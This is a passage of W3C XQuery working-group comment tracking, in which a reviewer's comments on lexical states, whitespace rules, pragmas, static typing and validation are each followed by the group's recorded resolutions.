whitespace rules /* ws:explicit */ and /* ws:significant */. For example, a direct element constructor has /* ws:explicit */ and begins with "<" QName. In the DEFAULT table, this is found in the row for "<" which performs a transition into state START_TAG while pushing state OPERATOR. It is a requirement not to permit whitespace between "<" and the QName. However, the lexical state tables for the most part assume that whitespace is permitted between two successive tokens. How can the lexical state tables work if some of the transitions permit whitespace between tokens and other transitions do not, and there is no indication in the tables as to which is which? You can't take refuge in the /* ws:explicit */ note attached to the EBNF, because the lexical rules must be executed before the EBNF. - Steve B. Resolution: this issue is closed, with no further changes, and SteveB/Oracle will double check that this is ok. Resolution: this issue is closed, with no further changes, and SteveB/Oracle will double check that this is ok." Scott Boag noted that (as the agenda shows) this is closed. Steve Buxton confirmed that he has double checked and wants this closed. [Liam notes this was closed at the MIT face-to-face, ] SECTION A.2.2: lexical rules DEFAULT state, on input "(:", has transition to EXPR_COMMENT followed by pushState(). I interpret this to mean the current state is changed from DEFAULT to EXPR-COMMENT, and then the current state (now EXPR_COMMENT) is pushed on top of the stack. We continue executing in EXPR_COMMENT state. On input ":)", the transition is popState(), which seemingly means that the EXPR_COMMENT state that is on the stack is popped and becomes the current state. This looks wrong. Don't we want to go to whatever state we were in before the comment? In that case, shouldn't the transition in DEFAULT state on input "(:" be pushState(DEFAULT) followed by entering EXPR_COMMENT state? Based on this example, I question whether any of the transitions should have pushState() as the second step. It makes more sense to do pushState() before changing the current state rather than after. This whole question of order of actions can be avoided by always pushing an explicit state. Each table knows what state is the current state, so you can just push that state explicitly when you want to push the pre-existing current state. - Steve B. Duplicate of 2004Feb0853. SECTION A.2.1: white space rules If an EBNF rule is marked as /* ws:significant */, it seems that it must apply to all the 'child' EBNF productions. For example, rule [109] ElementContent is marked as /* ws:significant */, which means that all whitespace is significant in ElementContent, and that must mean that all whitespace is significant in anything on the right hand side of rule [109]. But what about EnclosedExpr? Once you go into an enclosed expression, I think that whitespace should be insignificant again. If you say that /* ws:significant */ only pertains to the production on which it appears, and not to any nonterminals found on the right hand side, then I have two questions: 1) How do I know which whitespace is governed by the note, since S almost never appears on the right hand side of these rules; and 2) why is rule [109] labeled this way, since the right hand side consists only of a list of alternative terminals and non-terminals? Similar remarks apply to rule [112] QuotAttrValueContent and rule [113] aposAttrValueContent. - Steve B. SECTION. SECTION A.1: EBNF It seems that whitespace is permitted between a dollar sign and a QName, for example "for $ (: hello world :) prefix:localname" seemingly is permitted, since rule [43] ForClause is not tagged with /* ws: explicit */. However, I have not observed a single instance in the examples of whitespace between a dollar sign and a variable name. Regarding the dollar sign as an operator rather than the first character of a variable name seems to fly in the face of the inevitable user perception that $i is a variable name (rather than $ is an operator and i is the variable name). It might be more intuitive to change rule [20] to Varname ::= '$' QName /* ws: explicit */ and eliminate all the places where '$' appears as an operator sign. - Steve B. Accepted (Scott's rejection of the comment). Jim objects to allowing a variable reference such as "$ x" SECTION A.1: EBNF Rule [21] QName is a reference to another recommendation, "Namespaces in XML", which does not have a notion of "ignorable whitespace". Instead, all permissible whitespace is explicitly specified using the S non-terminal. This means that the EBNF conventions in "Namespaces in XML" is subtly different from the EBNF conventions in the present document. An EBNF in XQuery means that whitespace, comments, pragmas and must-understand extensions are permitted between successive items on the right hand side, whereas an EBNF in "Namespaces in XML" does not have that convention. It would be a mistake for a reader of XQuery to follow the link to "Namespaces in XML" and try to apply XQuery's whitespace rules to the rule found at the end of the link. I believe the intention is that XQuery's ignorable whitespace is not permitted on either side of the colon in a QName. Thus "prefix : localname" is not a valid QName for purposes of XQuery, just as it is not permitted in a textual XML document. Also, comments are not permissible on either side of the colon. Perhaps the way to clarify this is to add a /* ws:explicit */ comment to this rule. There may be other rules imported from other recommendations that need attention on this issue as well. - Steve B. See [446]. Excerpt: RESOLUTION: Scott to write a proposal This is the first of a series of whitespace problems that Scott will work on. ACTION: Scott to write proposal to make note about using XQ rules for whitespace when other specs are referenced Proposal accepted. SECTION 4.12: function declaration Rule [120] is marked with /* gn:parens */. Actually, that grammar note does not apply when declaring a function. Following the keywords "declare" "function" there is no doubt that the next QName must be the name of a function. This grammar note applies to function invocations, not declarations. - Steve B. Proposal accepted. SECTION 4.10: xmlspace declaration The keyword "xmlspace" suggests a connection with the xml:space attribute. The user might get the idea that "declare xmlspace preserve" causes an explicit or implicit xml:space='preserve' attribute in every element constructor, and "declare xmlspace strip" causes an explicit or implicit xml:space='default' attribute in every element constructor. I don't think this is your intention; I think you intend that the user must explicitly generate any xml:space attributes, just as the user must explicitly generate any other attributes. Some keyword other than xmlspace would be preferable, perhaps "boundaryspace" or "boundary space". - Steve B. DECIDED qt-2004Feb0642-01 resolved, closed, by renaming xmlspace to boundaryspace. SECTION 3.8: FLWOR expressions Rule [46] WhereClause uses Expr on the right hand side and not ExprSingle. I haven't come up with any examples to show that this is an outright bug, but it looks dangerous to allow a comma operator not surrounded by parentheses in this context. Also, a WhereClause such as "where expr1, expr2" is not intuitive or easy to understand. It is not equivalent to "where expr1 and expr2" and it is not equivalent to "where expr1 or expr2". This is seen from "where 0, 0". The effective boolean value of (0, 0) is true (any sequence of length greater than 1 is true), whereas the effective boolean value of both "0 and 0" and "0 or 0" is false. Note that every other clause of the FLWOR expression is built on ExprSingle. - Steve B. DECIDED: to change the parameter for WhereClause to Expr from ExprSingle [Liam note: this resolution may have been incorrectly recorded in the minutes; the joint WGs comfirmed at a later meeting that the document is now correct, however] SECTION 3.7.3.1: computed element constructors Under "content expression", step 4 says that it is an error for two or more attribute nodes to have the same name. Shouldn't there be a similar check in step 3 to insure that there are no duplicate or conflicting namespace nodes? - Steve B. Already fixed. SECTION 3.7.2: other direct constructors Rule [18] PITarget is different from XML 1.0 rule [17], which excludes "xml" in any combination of upper and lower case characters. It would be better to simply point to the XML 1.0 definition of this non-terminal. - Steve B. See [445]. RESOLUTION: accepted, refer to production in XML RESOLUTION: accepted, refer to production in XML [[accepted]] SECTION 3.7.2: other direct constructors The XQuery Data Model, section 6.6.3 "Comment information items", says that ." Does this mean that support for direct and computed comment constructors is optional for an XQuery implementation? - Steve B. SECTION 3.7.2: other direct constructors It says "Each of the above constructors is terminated by the first occurrence of its ending delimiter." Okay, fine. Then: "...the content of an XML comment may not contain the string '-->'". Actually, the restriction in XML 1.0, section 2.5 "Comments", rule [15], is that a comment may not contain "--", and this restriction is reiterated in the XQuery Data Model, section 6.6.1 "overview" (of comment nodes), item 2. Thus "<-- -- -->" is an illegal comment in XML 1.0. This should be forbidden here as well, since the result cannot be well-formed XML. - Steve B. See [444]. RESOLUTION: partly accepted already, resolving jan0093, but should also be excluded from the BNF Don and Michael R thought this was already done RESOLUTION: partly accepted already, resolving jan0093, but should also be excluded from the BNF [[accepted]] SECTION 3.7.1.3: content Rule 1)d) says that the type annotation of a copied element node is set to xs:anyType. You don't say what happens to the other PSVI contribution to the element's data model, the nilled property. Is it preserved or set to some fixed value? - Steve B. SECTION 3.7.1.3: content Rule 1)d) third sentence says "Copied element nodes are given the type annotation xs:anyType and copied attribute nodes are given the type annotation xs:anySimpleType." Since you are discarding the type information, don't you also have to regenerate the string value of the node, if it has not been preserved? - Steve B. SECTION 3.7.1.3: content Regarding step 3) in 3.7.1.3 on attribute nodes: at this point in section 3.7.3.1 "Computed element constructors", it talks about the possibility of having namespace nodes at the beginning of the content sequence, whereas this section is simply silent about them. Taken literally, that seems to mean that any namespace nodes left in the content sequence are still present at step 5) and consequently become either "children" or "attributes" of the element. It seems highly likely that you either mean to treat namespace nodes as an error, or else handle them the same as in section 3.7.3.1. - Steve B. SECTION 3.7.1.3: content Step 2), which raises an error when a document node is found in an enclosed expression in element content, is not user-friendly. The friendly thing to do would be to strip off the document node and treat it as a sequence of its top-level children. - Steve B. DUPLICATE - closed in today's telcon under +qt-2004Feb0495-01. SECTION 3.7.1.3: content Rules 1)a) and b) appear to be in the wrong order. If character references are expanded prior to looking for boundary whitespace, then character references for whitespace, such as , are likely to be treated as boundary whitespace and deleted, contrary to the explicit statement in 3.7.1.4 "Whitespace in element content". Implementing this as written will require keeping track of the origin of every whitespace character coming out of step a. - Steve B.. SECTION 3.7.1: direct element constructors Consider the following example: <a>{attribute b {1}}</a> Question: is this acceptable syntax, or is it an error because the }} is interpreted as a literal for right curly brace? If it is not acceptable, then it would be helpful to say that if the user has an expression requiring two successive }s, then the user should put whitespace between them. If it is acceptable, then you should qualify that }} is interpreted as a literal for a right curly brace unless used in a context where two successive right curly braces would be acceptable. According to the tables in A.2.2, }} is only recognized in state ELEMENT_CONTENT. I simuled the rules in these tables on the example above and found that it is in state OPERATOR when the }} is encountered. The OPERATOR state recognizes } but not }}. My tentative conclusion is that the example is valid and }} can be used to close two expressions, and not always as a literal for right curly brace. This appears to be the user-friendly answer, but I worry that users will find it hard to know when }} is a literal for a right curly brace and when it is two closing curly braces. One solution would be to do away with }} as a literal for curly brace. Instead, you might define a character reference. - Steve B. See [443]. RESOLUTION: no action, oracle accepted it's not needed. RESOLUTION: no action, oracle accepted it's not needed. [[rejected]] SECTION 3.5.3: node comparisons Regarding << and >>, I think that these should return true or false only when the comparands are nodes of some common supernode. If x and y are in completely unrelated documents, how can you decide whether x << y or x >> y? I know that The Data Model section 2.4 "Document order" says that there is an implementation-dependent total ordering of all documents which is stable during the execution of an expression evaluation. An implementation-dependent order does not do the user any good, and making it stable can not add value in the user's eyes to a feature with no value anyway. This merely burdens implementations with a useless requirement. I think it would be preferable to say that << and >> are partial orders, returning an empty sequence if two nodes have no common supernode. - Steve B. Rejected because (1) path expressions that span documents are not well-defined in the absence of document order, and (2) adopting this proposal would frequenty require implementations to determine whether two nodes are in the same document, imposing unnecessary overhead. Rejected because (1) path expressions that span documents are not well-defined in the absence of document order, and (2) adopting this proposal would frequenty require implementations to determine whether two nodes are in the same document, imposing unnecessary overhead. SECTION 3.5.2: general comparisons >From the examples, second bullet illustrates that = is not transitive. I think it would also be useful to point out that = and != are not logical negations of each other. For example, (1, 2) = (1, 3) is true (because 1=1), and (1, 2) != (1, 3) is also true (because 2 != 3). In fact, almost all of our accustomed rules about these comparison operators do not hold. Thus (1, 2) > (1, 3) because 2 > 1; (1, 2) < (1, 3) because 1 < 3. In fact, all six relationships are true between (1, 2) and (1, 3). - Steve B. Classified as editorial, and left to editor's discretion. SECTION 3.1.1 : literals There is no description, here or in Appendix A.1, of what is or is not a valid CharRef, merely that it is "an XML-style reference to a Unicode character, identified by its decimal or hexadecimal code point." The use of "XML-style" is unnecessarily vague. The answer is that it depends on whether the implementation is using XML 1.0 or XML 1.1 lexical rules. In either case, it is given by the Well-formedness Constraint: Legal Character" in section 4.1 of either [XML 1.0] or [XML 1.1]. This rule should be cited here. Otherwise it would appear that � conforms to the EBNF for CharRef, and it should not. - Steve B. See [442]. RESOLUTION: Agreed, link directly to the XML Specification, a reference with the discliamer that it could be either 1.0 or 1.1 Closed with editorial change by Don. [[accepted]] SECTION 3.1.1: literals May an implementation define additional PredefinedEntityRefs? For example, could an implementation define € as € ? - Steve B. This was decided to be conformance at meeting 180 Andrew: the document already answers this, the answer to "May an implementation define additional PredefinedEntityRefs?" is yes with a must-understand extension to XQuery. Oracle accepted this. RESOLVED: qt-2004Feb0606-01 closed, no change to the document. SECTION 2.6.6.1: XQuery flagger To assure portability, the flagger must adhere to the XML 1.0 lexical rules, since it is impossible to know whether the platform to be ported to will use XML 1.0 or XML 1.1. Note that Section A.2 "Lexical structure" says that implementations can use either XML 1.0 or XML 1.1 conventions. - Steve B. no more flagger. SECTION 2.6.6.1: XQuery flagger Besides flagging must-understand extensions, the flagger should call out any vendor extensions that are not must-understand extensions. Such extensions are probably inevitable (my prediction is that vendors will find the must-understand extension syntax too lengthy for their favorite extensions). In addition, you have not specified "no supersetting" as was done for Ada. The first sentence of section 2.6.6 "Must-understand extensions" says "an implementation may extend XQuery functionality by supporting must understand extensions." This does not say "an implementation may not extend except through must-understand extensions". Even if you had such a sentence, vendors will still be tempted to add extensions, and you lack the buying power of DoD to enforce a "no supersetting" rule. - Steve B. no more flagger SECTION 2.6.6: must-know extensions Definition, last sentence: A must-understand extension may be used anywhere that ignorable whitespace is allowed." The term "ignorable whitespace" is not defined. Section 2.6.5 "Pragmas" has a similar sentence, but at least it is followed immediately by the statement "See A.2 Lexical structure for the exact lexical states where pragmas are recognized" which effectively defines the term for that context, but that sentence limits itself to pragmas and does not apply to must-know extensions. There is a similar sentence in 3.1.6 "Xquery comments", which again is self-limited to just ExprComments. - Steve B. SECTION 2.6.6.1: XQuery flagger Judging from the tables in A.2 "Lexical rules", it is a syntax error to place a comment, pragma or must-understand extension between "for" and "$" when a ForClause is intended. Implementations will want to relax this to be more user-friendly in the case of comments, and they may also wish to define pragmas and must-understand extensions in this position. There are many similar restrictions on the placement of comments, pragmas and must-understand extensions in A.2 which implementations will want to relax. Any user application that avails itself of such a relaxation becomes non-portable. This section already requires the XQuery Flagger to identify the must-understand extensions. The flagger should also point out any violations of the lexical rules of A.2.2, such as more freedom to place comments and pragmas in various places, since such violations will be non-portable. - Steve B. Accepted: no specific change here, falls out of resolution for qt-2004Feb0658-01. Already Done. Issue closed. StB: This comment goes back to where a comment is allowed. Is a comment allowed between a "for" and the "$" of the variable. I think we decided the answer is yes. So this is a non-issue. Accepted: no specific change here, falls out of resolution for qt-2004Feb0658-01. SECTION 2.6.6.1: XQuery flagger First para, last sentence: "If the XQuery Flagger is enabled, a static error .. is raised if the query contains a must-understand extension." Assuming that a pragma can contain a must-know extension (a possibility raised in another comment), what are the consequences for flagging? Normally an implementation is free to ignore a pragma if it does not support it, so an XQuery expression that contains a pragma that contains a must-understand extension should run on any implementation, and there is no reason to flag it. But this sentence says that it should be flagged. - Steve B. Dependent on qt-2004Feb0598-01, which I trust will be resolved in the negative. Short answer: no Already Done. Issue closed. ScB: Since we don't have nesting, the short answer is no. StB: So a pragma can contain an must-understand extension? ScB: No. A pragma can't contain extensions. StB: But it'll just look like a nested comment, right? ScB: Yes, but this has to do with a pragma containing an extension. In the case of pragmas in extensions, they're not even comments, they're just characters. Basically, this can't happen. Proposal: no. Accepted. SECTION 2.6.6: must-understand extensions Making the pragma lexically an overloading of a comment is a good idea, because an implementation that has no pragmas can simplify their grammar to treat pragmas the same as comments (ie, don't distinguish them as separate lexical categories). The same does not apply to must-understand extensions. An implementation that has no must-understand extensions must still be on the look-out for them, because encountering a must-understand extension when you have none is a syntax error. For that reason, it seems like a bad idea to make the syntax for a must-understand extension be an overloading of the comment syntax. This means that a simple implementation with neither pragmas nor must-understand extensions can not treat anything beginning with (: as a comment. Instead it is still burdened with the need to detect "(:: extension" because that is not a comment, it is a must-understand extension (and, for that implementation, a syntax error). Some other way of denoting a must-understand extension would be preferable. Some ideas are MUExtensions ::= "{:" QName ExtensionContents* ":}" MUExtensions ::= "ext" "{" QName ExtensionContents* "}" - Steve B. Proposal: No Change. DC will clarify this as part of his editorial changes. Already Done. Issue closed. StB: Just generally saying that (: and (:: are bound to cause confusion. MH: I think there are items further down that identify a bunch of issues related to this confusion. AE: I don't recall exactly how we came to this syntax. PC: It's a special kind of comment. If you don't understand the pragma, it's just ignored. JR: I think letting them nest and contain comments would make sense. ScB: I think we turn this over to StB/MH, to see if they can get a proposal going in email. MH: It's the nesting that gets confusing. DC: Within a comment, the content is treated just like content. If you put a pragma inside a comment, it wouldn't be recognized as a pragma and ::) would terminate the comment and the rest would be a syntax error. ScB: No, we allow nested comments so it would parse correctly. Two proposals: 1. no nesting comments in pragmas or pragmas in comments. 2. symmetric nesting of comments and pragmas PC: Are both alternatives feasible? ScB: Yes. ScB: We've agreed to not allow extensions in extensions, so I think what we've got now works. Mary's happy, right? MH: Yes, mostly. Propose: resolve without change. Accepted. DC will clarify this as part of his editorial changes. SECTION 2.6.5: pragmas Can a pragma include a must-understand extension? For example, (:: pragma my:pragma (:: extensions my:ext ::) ::) In this example, is "(:: extension my:ext ::)" to be interpreted as a must-understand extension sitting in a place where ignorable whitespace can go, or is it the value of PragmaContents? What are the semantics of this ? - Steve B. Proposal: No. Already Done. Issue closed. ScB: No, the form of a must-understand extension would terminate the pragma. Accepted. SECTION 2.6.5: pragmas Can a Comment be nested in a Pragma? Section 3.1.6 "Xquery comments" says that "Comments may be used anywhere ignorable whitespace is allowed." In the following example: (:: (: comment 1 :) pragma (: comment 2 :) prefix (: comment 3 :) : (: comment 4 :) localname (: comment 5 :) contents (: comment 6 :) more contents (: comment 7 :) ::) which of the comments are acceptable? - Steve B. The answer should no. Neither should comment nesting rules apply. Already Done. Issue closed. ScB: Proposal: no a pragma can't include a comment. Accepted. SECTION 2.6.5: pragmas Rules [1] "Pragma" and [5] "PragmaContents" are ambiguous because they do not exclude the possibility of "::)" being among the PragmaContents* . See the way XML 1.0 rule [15] defines "Comment". Actually, that rule prohibits "--" from being in the body of a Comment, and not merely "-->", perhaps so that you only need one character lookahead to decide if the comment is coming to an end. You may want to have a similar rule excluding "::" from the body of a Pragma (or excluding "::)" if you are willing to tolerate two-character look-ahead). Similar remarks apply to rule [2], "MUExtension". As for Rules [3] "ExprComment" and [4] "ExprCommentContent", you want to exclude ":)" from ExprCommentContent. - Steve B. Make it explicit that "(::" etc. have no meaning within pragma's and extensions. "::)" should not be allowed as pragma or extension content. Don objects to this grammar notation on grounds of readability. Applies to many productions including Pragma, MUExtension, Comment, CDataSection, etc. Scott proposes to break each unreadable production into two parts. For example, the Pragma production will include PragmaContent on the RHS, and PragmaContent will be defined separately using a BNF "subtraction" operator with an explanatory note. Issue remains open pending review of a new draft to be prepared by Scott. Already Done. Issue closed. ScB: Proposal: comments and "(::" should have no meaning in the extension or pragma context. You cannot have a comment within a pragma or a pragma within a comment. (A pragma within a comment is just content.) StB: It is legal, but it's just part of the comment? And they have to nest properly. MH: So you can't have a comment within a pragma? ScB: A comment in a pragma is just part of the pragma. Accepted. SECTION 2.6.2: static typing feature Section 3.7.3.1 "Computed element constructors" gives an interesting example of a way to construct an element with the same name as a given element, but with a different content. The note following the example says that the example is not portable because it will not work under the Static Typing Feature. To me, this example calls into question the utility of the feature. The note gives a workaround, using the function fn:exactly-one, and the F&O has additional functions which will overcome certain other static typing issues. The conclusion I draw is that anyone interested in portable programming will be required to use these functions as guards to explicitly disable the static typing feature, in case the application is ported to such an implementation. The purpose of the guard functions is to give the application precisely the behavior it would have had if the static typing feature were not supported. I am wondering if the problem is in an overly fastidious notion of what static typing should do for the user. To me, a function invocation fct(arg) whose sole parameter is declared to be item() or item()+ with an argument arg whose static type is item()? or item()* does not look like a static type error, because it is possible that the command will succeed at run-time. I suggest that the static typing feature should raise type errors when the static type of an actual argument or operand has empty intersection with the required type in that position. In such a case it is a certainty that there would be a run-time error, and therefore a user benefit to provide early detection of such errors. I can see this as a user benefit even if the code is unreachable, because it probably reveals a logic error on the user's part. But to raise static errors for situations that might run successfully on certain inputs seems like a disservice to the user. - Steve B. 49. +qt-2004Feb0593-01 ORA-XQ-092-B: definition of static typing is too rigorous to be useful. SECTION 2.5.2: Handling dynamic errors Third para, second sentence: "For example, an error value might be an integer, a string, a QName, or an element." In Functions and Operators section 3 "The error function" second para third sentence, it says "Each error defined in this document [ie, F&O] is identified by an xs:QName that is in the namespace associated with the xdt: prefix." This seems like a good convention, that all dynamic errors specified by the W3C specification are QNames in a single namespace. It would be good if the rest of the specifications in the XQuery suite adhered to the same convention. This may well be your intent already, in which case the sentence I started with, "For example, an error value might be an integer..." should be construed as referring to values permitted to a user invocation of fn:error. However, in the context in which it appears, it seems to be referring to dynamic errors specified by the XQuery language specification. - Steve B. Closed because the issue is addressed by Andrew's error proposal, which was adopted 4 May. SECTION 2.6.1: Schema import feature It says: is raised.[err:XQ0012]". This seems to contradict the assertion in Section 2.2.5 "consistency constraints", where it says that "enforcement of these consistency constraints is beyond the scope of this specification". I think that you have it right here in section 2.6.1 and wrong in section 2.2.5. - Steve B. 47. +qt-2004Feb0591-01 ORA-XQ-088-C: enforcement of imported schema consistency. SECTION 2.2.5 : Consistency constraints First para, last sentence: "Enforcement of these consistency constraints is beyond the scope of this specification." I can think of three ways a violation could occur: a) The XQuery language specification itself specifies a violation of one of these constraints. Of course, we are fallible and mistakes happen, but presumably the working group will endeavor to fix any such inconsistencies when they are reported. b) The initialization of the static and dynamic context provides an inconsistent 'start state' for XQuery expression evaluation. This can be handled in either of two ways: i) by specifying that the XQuery implementation shall begin by checking its static and dynamic context for violations and report any violations as exceptions. ii) that might be regarded as too much overhead, so you might prefer to specify 'lazy' constraint checking, only checking a value when the value is referenced, or some aspect of a value is referenced. c) The violation occurs dynamically during expression evaluation. This can be handled by specifying that the constraints shall be checked whenever a value is constructed. - Steve B. 46. +qt-2004Feb0587-01 ORA-XQ-080-C: Enforcement of consistency constraints Andrew It may be a duplicate from another comment (????). Don had an item regarding solution. Add sentence on top of consistency constraints paragraph. This issue is closed as resolved by ORA-XQ-217-C No further action required Andrew It may be a duplicate from another comment (????). Don had an item regarding solution. Add sentence on top of consistency constraints paragraph. This issue is closed as resolved by ORA-XQ-217-C No further action required SECTION 2.2.3.2: dynamic evaluation phase Second para, last sentence: sentence makes the Static Typing Feature all-or-nothing, precluding what I will call a partial implementation of the Static Typing Feature, in which an implementation detects and raises some, but not all, type errors, and does not progress to the dynamic evaluation phase if it finds a type error. This does not appear to do the user any good. It means that if the implementation does not do a total job of type error checking, then effectively it has not done any at all (except to raise warnings). I think it would be better to say "if the Static Typing Feature is not in effect, then it is implementation-defined what type errors are detected and raised during the static analysis phase, aborting the dynamic evaluation phase." - Steve B. 45. +qt-2004Feb0585-01 ORA-XQ-078-B: XQuery should permit partial static typing. SECTION 2.2.3.1 : Static analysis phase sixth para: "if the Static Typing Feature is in effect and the static type assigned to an expression other than () is empty, a static error is raised." Does this mean that "let $i = ()" is a static type error? - Steve B. 44. +qt-2004Feb0583-01 ORA-XQ-076-C: Is "let $i = ()" permitted?. SECTION. 43. +qt-2004Feb0576-01 ORA-XQ-073-C: "available documents is not constrained by ... statically known documents". SECTION 2.1.1: Static context Statically known collections: it says that the default type of a collection is node()?. But in 2.3.4 "Input sources" it says that the result of invoking fn:collection can be "any sequence of nodes", that is, node()*. - Steve B. 42. +qt-2004Feb0565-01 ORA-XQ-069-E: what is the default type of a collection? Issue closed with no further action. Default type of a collection should node()*. Issue closed with no further action. Default type of a collection should node()*. SECTION 2.1.1: Static context In-scope collations: it says that a collation "may be regarded as an object that supports two functions...". In F&O section 7.5 "Functions based on substring matching" fourth paragraph, it says "For other functions, such as fn:contains(), the collation needs to support an additional property: it must be able to decompose the string into a sequence of collation units...". This "additional property" appears to be the same as the second of the two functions in a collation object. The choice of the words "it must be able to..." in F&O suggests that F&O regards the presence of this second function as optional. Also, in F&O 7.5.1 "fn:contains", second para, last sentence, it says "If the specified collation is unsuitable ... an error may be raised." What would make a collation unsuitable? The reader is left with the impression that one thing that might make a collation unsuitable is if the collation does not support the second function. (Some other possibilities are mentioned in F&O 7.31 "Collations", including issues with normalization.) Summary: please clarify whether the second function is a mandatory or an optional part of a collation object. I am entering separate comments asking to clarify some of these points in F&O as well. - Steve B. There was a feeling we had already dealt with this issue or others like it. KK pointed to 2004Feb0990-01, an F+O issue, "Please define collations", which was accepted and closed in August. JM: Please tell the meeting that it is my opinion that the changes we accepted for "minimal matching" should resolve this question for the purposes of F&O at least, and I think we've otherwise satisfactorally defined collations. KK: would it be good for the language book to contain a reference to the F+O definition. RESOLVED: no action required, DC to consider making a cross-reference to the F+O definition. SECTION 2.1.1: static context Regarding in-scope namespaces, an implementation should be allowed to predefine some namespaces for the convenience of the intended user community. Such namespaces might be used to reference types and functions that are supplied with the product, for example. Naturally, these should be implementation-defined namespaces (ie, documented to the end user). It would be helpful to say explicitly that there may be implementation-defined namespaces among the predefined namespaces. - Steve B. AE: Points out that this is given in normative appendix C.1. RESOLVED WITH NO CHANGE. SECTION. AE: Points out that this is given in normative appendix C.1. RESOLVED WITH NO CHANGE. See 4.11 Namespace Declaration, which lists them. Also C.1 SECTION 2: Basics First sentence: "... the expression, which is a sequence of Unicode characters." Certainly in order to support XML, an implementation will need to support Unicode in its data values, but is this necessary in a source language expression? SQL (ISO/IEC 9075) distinguishes what it calls "the source language character set", which is not necessarily the same as any character set in the data. Of course, XQuery expressions can include literals for Unicode strings, and XQueryX, being expressed in XML, is necessarily expressed in Unicode as well. But wouldn't it be sufficient for XQuery to allow the source language character set to be any implementation-defined character set, provided there was an implementation-defined mapping to convert the source language into Unicode? For example, if a user is working in an environment with EBCDIC or Shift-JIS editors, the user will probably want to compose his XQuery expressions in those character sets. - Steve B. See [441]. RESOLUTION: we've been here before, closed with no further action ADOPTED RESOLUTION: ACTION-ITEM-177-02: Jim Melton to provide proposed wording. DONE. See: Add a sentence (actually, an Informative Note) following the first sentence of the first paragraph in Section 2, "Basics". That new sentence/note should read "Note: This specification makes no assumptions or requirements regarding the character set encoding of strings of Unicode characters." SECTION 2.2.3.1: Static Analysis Phase "The operation tree is then normalized by making explicit the implicit operations such as atomization, type promotion and extraction of Effective Boolean Values (step SQ5)." In step SQ6, there is a static type checking phase. In SQ5, if the type checking (step SQ6)has not occurred, how can it do 'type promotion' which requires type information on the operation tree? Does this mean SQ5 and SQ6 are not sequentially done in order ? Probably need to iterate between 5 and 6 ? - Steve B. MR and JS explain the way it is done by normalization. It can be done sequentially or not. The formal semantics does it sequentially. MR: Have the pointer to formal semantics, but do not change current wording. DC: pointer is already there. RESOLVED WITH NO CHANGE. SECTION 2.2.5: Consistency Constraints There should be something here to say when these consistency constraints need to hold. For example, "All variables defined in in-scope variables must be defined in dynamic variables" won't be true until execution after all external variables have been bound. - Steve B. DC: Constraints define the circumstances under which XQuery is well-defined. So there is no way to define errors or detect it. This seems true for all except for the one referred to in +qt-2004Feb0548-01 which is only in this category for XPath. PC: Proposal: Make variable one XPath only. Add sentence to explain axiomatic nature. JM: proposed wording : "This specification does not define the results of an XQuery[/XPath] expression under any condition where one or more of these constraints are not satisfied." MR: Just need to make sure that the variable alignment is not removed from XQuery. AE: This is still guaranteed by section on dynamic context. ADOPTED RESOLUTION: Deleting bulleted item in Oracle comment for both. Adding Jim's proposed wording for both. Section 3.13 Validate Expressions Technical The definition of lax validation is not aligned with the XML Schema definition of lax validation that checks for presence in the ISSD on a level-by-level basis. This should be fixed. DC: Corrected in current editor WD. FIXED. Section 3.13 Validate Expressions Technical We consider the validate expression (and the implicit validation on element construction) to be too complex and potentially confusing to users for the following reasons: - Validate will validate against all ISSD. Most usecases we come across, users want to validate against a specific output schema. Since that can be done outside of the XQuery statement, the validate expression becomes less useful. - The schema context part of validate is pretty complex and most users will not understand it at the beginning. This looks like a good vNext or optional feature. Thus we would like to propose: 1. Make default validation mode to be skip 2. Remove Schema context from the spec 3. Make support for validation modes lax and strict and the validate keyword an optional feature. (See also MS-XQ-LC1-089). Resolved by the following: 1. Make default validation mode to be skip 2. Remove Schema context from the spec 3. Make support for validation modes lax and strict and the validate keyword an optional feature Action on Jonathan to move #3 as an issue in the conformance cluster. Section 3.10 Conditional Expressions Technical As others, we would like to recommend making the else clause optional (defaulted to else ()) and add a ending token (e.g. end, endif) to have a disambiguation for the dangling else clause. Same as qt-2004Jan0378-01 PaulC: so, new evidence to make this decision? anybody that can't live with changes? Yes: at least Don, Robie. So, resolved: rejected. DC: else is still required. Was done at Mandelieu F2F and REJECTED. [[rejected]] Section 3.8.3 Order By and Return Clauses Technical Provide an XQuery prolog statement affecting the static context to define empty sort default. Michael R asks for an XQuery prolog statement affecting the static context to define empty sort default. Proposal: declare default order empty [choices: least greatest] Jim asked that the scope be made clear. Left to the editors. Don asked for approval of the following values and got it: schema component name: default empty ordering for empty sequence default predefined value: none can it be overwritten by an implementation : yes can it be overwritten by query: yes, by a prolog or orderby clause scope: module resource consistency rules: only one declaration per prolog RESOLUTION: Resolved by the adoption of the proposal: declare default order empty [choices: least greatest] Section 3.7.3.7 Computed Namespace Constructor Technical How can I declare a default namespace? I always have to provide the NCName. Can we make the NCName optional and then make it define the default namespace? this has been subsumed by a response to an earlier comment 3.7.3.5 Computed Processing Instructor Constructor Technical Why is the rule based on using Qname values instead of NCName values? We would prefer if we can raise a type error when a Qname is provided. Some discussion to investigate impact of proposed change. Since xs:NCName is a subtype of xs:string we can just drop xs:QName. ADOPTED. Some discussion to investigate impact of proposed change. Since xs:NCName is a subtype of xs:string we can just drop xs:QName. ADOPTED. Section 3.7.3.5 Computed Processing Instructor Constructor Technical Also allow an instance of xdt:untypedAtomic as a name value. ADOPTED. ADOPTED. Section 3.7.3.1 Computed Element Constructor Technical "A computed element constructor automatically validates the constructed node, using the validation mode and validation context from its static context, as described in 3.7.1.5 Type of a Constructed Element. If the name of the constructed element is specified by a constant QName, this QName is added to the validation context for nested expressions. On the other hand, if the name of the constructed element is specified by a name expression, the validation context for nested expressions is set to global.": The fact that the validation context stays global inside a constructor that has a name expression will be confusing and hard to explain. Users will expect that the validation is done at runtime, so the validation context in this case should be a runtime context. We can solve this by either not doing implicit validation on element construction (regardless if literal or computed element constructor), or by saying that the context will not be known until runtime in this case. Section 3.7.1.5 Type of a Constructed Element Technical "constructed element has an attribute that causes it to be validated as an integer:": This is only true if validation mode is lax or strict and no conflict exists. If a conflict exists, then an error is raised and if validation mode is skip the value is still untyped. DC: This sentence has been removed by an action item from Mandelieu to reword this section. Comment has been RESOLVED, please check new section. Section 3.7.1.5 Type of a Constructed Element Technical We believe that implicit validation on element construction (and validation in general) adds considerable complexity to XQuery. However, there is still value in having input data typed. Therefore we propose to decouple validation from the schema import and either remove validation from XQuery or make it a separate optional validation feature (that then may also add the validation mode preserve). Thus, an implementation would only have to support the semantics of validation mode = skip in the base conformance. RESOLUTION. Closed. No action required. Overtaken by events. Sections 3.7.1.3/3.7.3.3 Technical "If the content sequence contains a document node, 